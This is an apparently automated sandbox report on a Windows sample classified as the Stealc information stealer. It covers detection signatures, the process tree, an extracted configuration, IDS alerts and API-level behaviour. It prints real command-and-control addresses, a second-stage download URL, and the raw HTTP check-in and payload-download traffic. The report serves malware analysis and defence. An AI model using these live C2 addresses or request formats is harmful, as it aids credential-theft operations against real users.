Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TP77MvSzt2.exe

Overview

General Information

Sample name:TP77MvSzt2.exe
renamed because original name is a hash value
Original sample name:1e1e32d1eedb37a1e3c1ad488621b26f.exe
Analysis ID:1542870
MD5:1e1e32d1eedb37a1e3c1ad488621b26f
SHA1:3896ddcb3211b9412fac2490687bdc0c1d609cc1
SHA256:c5fd02988cb7a5430c4542227ccc37e121f586ee671060f1428262af5477c319
Tags:exeStealcuser-abuse_ch
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Machine Learning detection for dropped file
Machine Learning detection for sample
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • TP77MvSzt2.exe (PID: 6808 cmdline: "C:\Users\user\Desktop\TP77MvSzt2.exe" MD5: 1E1E32D1EEDB37A1E3C1AD488621B26F)
    • 9B3F.tmp.exe (PID: 5440 cmdline: "C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe" MD5: 8107C38AF897D81AA4BFE8CE9CA8407C)
      • WerFault.exe (PID: 4820 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5440 -s 1076 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://62.204.41.177/edd20096ecef326d.php", "Botnet": "default9_cap"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.4210942714.0000000002DA9000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x1678:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000001.00000002.2966797377.00000000008D9000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0xf18:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000001.00000002.2966895028.0000000000903000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000001.00000003.1890384473.0000000002310000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Click to see the 5 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          1.2.9B3F.tmp.exe.400000.0.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
            1.2.9B3F.tmp.exe.b00e67.3.unpackJoeSecurity_StealcYara detected StealcJoe Security
              1.2.9B3F.tmp.exe.400000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                1.3.9B3F.tmp.exe.2310000.1.unpackJoeSecurity_StealcYara detected StealcJoe Security
                  1.2.9B3F.tmp.exe.b00e67.3.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                    Click to see the 1 entries

                    Sigma Signatures

                    No Sigma rule has matched

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-26T19:08:34.605219+020020442431Malware Command and Control Activity Detected192.168.2.44973262.204.41.17780TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-26T19:08:22.376374+020028032742Potentially Bad Traffic192.168.2.449730104.21.56.70443TCP
                    2024-10-26T19:08:23.474770+020028032742Potentially Bad Traffic192.168.2.449731176.113.115.3780TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: TP77MvSzt2.exeAvira: detected
                    Found malware configuration
                    Source: 00000001.00000003.1890384473.0000000002310000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://62.204.41.177/edd20096ecef326d.php", "Botnet": "default9_cap"}
                    Multi AV Scanner detection for submitted file
                    Source: TP77MvSzt2.exeReversingLabs: Detection: 47%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: TP77MvSzt2.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,1_2_0040C820
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,1_2_00407240
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,1_2_00409AC0
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,1_2_00418EA0
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,1_2_00409B60
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00B074A7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,1_2_00B074A7
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00B09DC7 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,1_2_00B09DC7
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00B09D27 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,1_2_00B09D27
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00B19107 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,1_2_00B19107
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00B0CA87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,1_2_00B0CA87

                    Compliance

                    barindex
                    Detected unpacking (overwrites its own PE header)
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeUnpacked PE file: 0.2.TP77MvSzt2.exe.400000.0.unpack
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeUnpacked PE file: 1.2.9B3F.tmp.exe.400000.0.unpack
                    Source: TP77MvSzt2.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: unknownHTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.4:49730 version: TLS 1.2
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_0040E430
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,1_2_004138B0
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,1_2_00414570
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00414910
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,1_2_0040ED20
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,1_2_0040BE70
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040DE10
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_004016D0
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_0040DA80
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,1_2_00413EA0
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040F6B0
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00B0DCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_00B0DCE7
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00B0C0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,1_2_00B0C0D7
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00B0E077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00B0E077
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00B01937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00B01937
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00B0F917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00B0F917
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00B14107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00B14107
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00B0E697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_00B0E697
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00B0EF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,1_2_00B0EF87
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00B147D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,1_2_00B147D7
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00B13B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,1_2_00B13B17
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00B14B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00B14B77

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49732 -> 62.204.41.177:80
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: http://62.204.41.177/edd20096ecef326d.php
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 26 Oct 2024 17:08:23 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sat, 26 Oct 2024 17:00:01 GMTETag: "62400-625642a987083"Accept-Ranges: bytesContent-Length: 402432Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4b fa 88 0b 0f 9b e6 58 0f 9b e6 58 0f 9b e6 58 b2 d4 70 58 0e 9b e6 58 11 c9 62 58 11 9b e6 58 11 c9 73 58 1b 9b e6 58 11 c9 65 58 64 9b e6 58 28 5d 9d 58 0a 9b e6 58 0f 9b e7 58 74 9b e6 58 11 c9 6c 58 0e 9b e6 58 11 c9 72 58 0e 9b e6 58 11 c9 77 58 0e 9b e6 58 52 69 63 68 0f 9b e6 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 bd b3 2f 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 a8 03 00 00 38 10 00 00 00 00 00 ea 16 00 00 00 10 00 00 00 c0 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 26 00 00 04 00 00 5b 38 06 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc db 03 00 3c 00 00 00 00 f0 11 00 f0 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1c a6 03 00 00 10 00 00 00 a8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e0 25 00 00 00 c0 03 00 00 26 00 00 00 ac 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 78 f9 0d 00 00 f0 03 00 00 4c 00 00 00 d2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 14 14 00 00 f0 11 00 00 06 02 00 00 1e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.177Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKJKEBKFCAAECAAAAAECHost: 62.204.41.177Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 45 42 4b 46 43 41 41 45 43 41 41 41 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 45 33 42 46 33 36 42 32 31 34 38 32 36 30 34 39 38 32 31 36 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 45 42 4b 46 43 41 41 45 43 41 41 41 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 39 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 45 42 4b 46 43 41 41 45 43 41 41 41 41 41 45 43 2d 2d 0d 0a Data Ascii: ------KKJKEBKFCAAECAAAAAECContent-Disposition: form-data; name="hwid"3E3BF36B21482604982160------KKJKEBKFCAAECAAAAAECContent-Disposition: form-data; name="build"default9_cap------KKJKEBKFCAAECAAAAAEC--
                    Source: Joe Sandbox ViewIP Address: 176.113.115.37 176.113.115.37
                    Source: Joe Sandbox ViewIP Address: 62.204.41.177 62.204.41.177
                    Source: Joe Sandbox ViewIP Address: 104.21.56.70 104.21.56.70
                    Source: Joe Sandbox ViewASN Name: TNNET-ASTNNetOyMainnetworkFI TNNET-ASTNNetOyMainnetworkFI
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49731 -> 176.113.115.37:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49730 -> 104.21.56.70:443
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_00402A14 InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00402A14
                    Source: global trafficHTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
                    Source: global trafficHTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.37
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.177Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficDNS traffic detected: DNS query: post-to-me.com
                    Source: unknownHTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKJKEBKFCAAECAAAAAECHost: 62.204.41.177Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 45 42 4b 46 43 41 41 45 43 41 41 41 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 45 33 42 46 33 36 42 32 31 34 38 32 36 30 34 39 38 32 31 36 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 45 42 4b 46 43 41 41 45 43 41 41 41 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 39 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 45 42 4b 46 43 41 41 45 43 41 41 41 41 41 45 43 2d 2d 0d 0a Data Ascii: ------KKJKEBKFCAAECAAAAAECContent-Disposition: form-data; name="hwid"3E3BF36B21482604982160------KKJKEBKFCAAECAAAAAECContent-Disposition: form-data; name="build"default9_cap------KKJKEBKFCAAECAAAAAEC--
                    Source: TP77MvSzt2.exe, 00000000.00000003.1836716816.0000000002E4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exe
                    Source: TP77MvSzt2.exe, 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exe48rt8k8rt4rwe5rbSOFTWARE
